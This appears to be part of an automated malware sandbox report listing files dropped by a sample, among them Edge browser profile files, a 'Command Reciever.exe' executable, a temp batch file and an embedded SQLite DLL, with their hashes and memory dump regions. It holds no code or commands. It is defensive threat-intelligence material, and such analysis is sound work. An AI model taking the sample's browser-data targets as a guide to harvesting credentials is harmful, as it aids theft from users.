ef12cabd94760038e3b587806e92d529ca651f290c0a9f322282810229de04dd92c4af400b036971dcc596c30f49ff99b539cafdf6e0e2e5548be61a5cbb65d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
998868895965ced1c79e295588b17525

SHA1
34bee800003c4c2051dd52c9e61fc1e4e95896ae

SHA256
f259ef1336f26f453d55a6704792ed9140bcda1afeee90339596336979e6f9f4

SHA512
f3960e93ef65d8323d438f28dfc3e854346e1d07b0b49ec326bc0ccbc4e3da487e5be8536d5fb3e8338302aeb7c07757cff223e8a430f3144955ee82b4b1fd0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
15abad61838151076ebecea7794a070f

SHA1
944be6cfaa5d68762cec55201f8d718c1a4df642

SHA256
2bc09f99a873e68c04d4d7d9e2af0d9655ce634846363c1a64cba10b9cabac8d

SHA512
5121b9aea9aa2cfecbfc23d53b7ce7775e872f42a9bc47992731f6621a8a0d89efde5110131136f6ebdee314003e33c229d4bfc04bd8d1660cdca660102a96d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
98db222ca484b34a2450fb6ba2288217

SHA1
7c5b9574eccd514fb7baf55166a9b86f1ef1256f

SHA256
ccc3f53b0f6a213cd49816310ab2ddb455a688678253c15005ef7569eef7d94a

SHA512
e30e53d0af9846c8d66f8d6b78491d12f8865d471ff678c86318702c32734091c0a153cb64d7e554d437d37de383e538f10e5ce4bc88d10e6445d14c196c597b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57e01f.TMP

Filesize
1KB

MD5
1d9386199706c9292695fff33eaac66a

SHA1
8c26bc83bf0e83b3197e3254a6e36c711ca449f3

SHA256
ce964f220cdb41e57f8dd938bf113f675fa1edbf30742fb01e35f52c9941ad6a

SHA512
3ecbb367e85c79b9affbc57ae6952531407695fa661c412f74e4a2d1d13e3751881c3d5d26a6661cd6020011f3cb1e0ede33a015dcd1d9fa0c25f3757534aa27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
ef2a968fc24530b51bf4f06d19cfe3d8

SHA1
ca2eb43b7836d56480052269d0d440503f80dd20

SHA256
39a2fcf9c6a54927a4475f0a2f3a88d852b1d4ff7e0b16c3280f3fe44082ea43

SHA512
8062b8001252bf10a704c174220661a7c53b23c66386b5429bc6872edbfe51bd16b7ec08675893c9a292e978c03b42f48063b826971cf5326919b9d1423db663

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
3dca31b4898f09de4c30f43c975b205f

SHA1
348bbfb68fcb7672ca2b4781e7dbde1042019d86

SHA256
91a63a2c252a7987f8bd775a40303aba5b1d7b2b4ecca9d158e69601036be7b9

SHA512
f21b212600245abae3daeeba4bc7182e331b8ea45ddf160afdc37e64c51f9aa1c96f2d5f1eaaf20f89fc09a8f92c8cd0d87d2ed57d5319346e00f3a80aa5ba5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
7d201ab18bcaa11cd14e28803e3a5345

SHA1
f2d96af6e1b34b23f5b412d16d917a32daa04864

SHA256
291eb6807ab8915b8e28b26f30d7ab8bf2e31e0d40b6507e3d9bca29f0812222

SHA512
6f528ccaf835339cda2858817fb181cc5ea40343faa1f90c0ec887ed3061804daa0ac26afad1cd0a12042f7bf5ddef1911cd2570346a43620c67e3acafa930fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
220ac0d86abcaf36ac48612a9524c468

SHA1
e350c3e97e54a97050260d2951ef8b91b38bab60

SHA256
76e048d74dc523a2e3211498a72d12634678e958d49c8cdbf9bf37d67586b39e

SHA512
2ed3103ee1489b40f6aec93064473e1a3996e9847f409b761940da81efbcf30749d0280295453fefba5eb67df8eb7775c230ac46fb569604624e4a09eadfdf06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe

Filesize
5.6MB

MD5
eb01eece5f0887b24a1bd53183d801dc

SHA1
49e92aee8351e3a995d8ec95bc64d7f381dcee28

SHA256
a2b1012a39662b760415ee897388c862457f4f1672897db8dee67e125bf0ad5c

SHA512
83374fdc381d52b64682df5b96f02cb3d487ce12d9231ede8ee9a92ecf72fa4a0d6f91a04e5f6656cccd50f142dd44bbb08e7ecc94b647e0349064dc32a76839

Download Submit
C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

Filesize
1.7MB

MD5
65ccd6ecb99899083d43f7c24eb8f869

SHA1
27037a9470cc5ed177c0b6688495f3a51996a023

SHA256
aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

SHA512
533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpBAFE.tmp.bat

Filesize
295B

MD5
14cb79053801cc739678fc23135e6004

SHA1
432dd61f7070fc41240ab379642ccc763de916e6

SHA256
3aba880e36a29e4e0a7d71840b1c7b4a24768004ae33586b2c89e0f23d4d0317

SHA512
daf55e30543eef675a43417ada2decb8a2e99e2d2e5b787cad066b4c32b62ab5db7460316f37d7dbbcddcb778bf25a4d3c786406618e6131037a14288ff235b4

Download Submit
memory/2400-344-0x0000000000AA0000-0x0000000000CE2000-memory.dmp

Filesize
2.3MB

Download
memory/2400-345-0x0000000005D10000-0x00000000062B4000-memory.dmp

Filesize
5.6MB

Download
memory/2872-354-0x0000000000900000-0x0000000000F92000-memory.dmp

Filesize
6.6MB

Download
memory/2872-361-0x0000000005900000-0x0000000005992000-memory.dmp

Filesize
584KB

Download
memory/2872-368-0x0000000005800000-0x000000000580A000-memory.dmp

Filesize
40KB

Download
memory/2872-369-0x0000000005B20000-0x0000000005B76000-memory.dmp

Filesize
344KB

Download
memory/2872-359-0x0000000005860000-0x00000000058FC000-memory.dmp

Filesize
624KB

Download
memory/2872-371-0x0000000009520000-0x0000000009586000-memory.dmp

Filesize
408KB

Download
memory/4864-384-0x00000236A8340000-0x00000236A83F2000-memory.dmp

Filesize
712KB

Download
memory/4864-382-0x00000236A82D0000-0x00000236A833A000-memory.dmp

Filesize
424KB

Download
memory/4864-385-0x00000236A8440000-0x00000236A8490000-memory.dmp

Filesize
320KB

Download
memory/4864-386-0x00000236A8490000-0x00000236A84B2000-memory.dmp

Filesize
136KB

Download
memory/4864-388-0x00000236A8500000-0x00000236A853A000-memory.dmp

Filesize
232KB

Download
memory/4864-389-0x00000236A84C0000-0x00000236A84E6000-memory.dmp

Filesize
152KB

Download
memory/4864-390-0x00000236A91C0000-0x00000236A94EE000-memory.dmp

Filesize
3.2MB

Download
memory/4864-412-0x00000236A8560000-0x00000236A8572000-memory.dmp

Filesize
72KB

Download
memory/4988-372-0x000001E25A080000-0x000001E25A08A000-memory.dmp

Filesize
40KB

Download
memory/4988-367-0x000001E25A110000-0x000001E25A186000-memory.dmp

Filesize
472KB

Download
memory/4988-360-0x000001E23F6E0000-0x000001E23FC82000-memory.dmp

Filesize
5.6MB

Download
memory/4988-370-0x000001E25A060000-0x000001E25A07E000-memory.dmp

Filesize
120KB

Download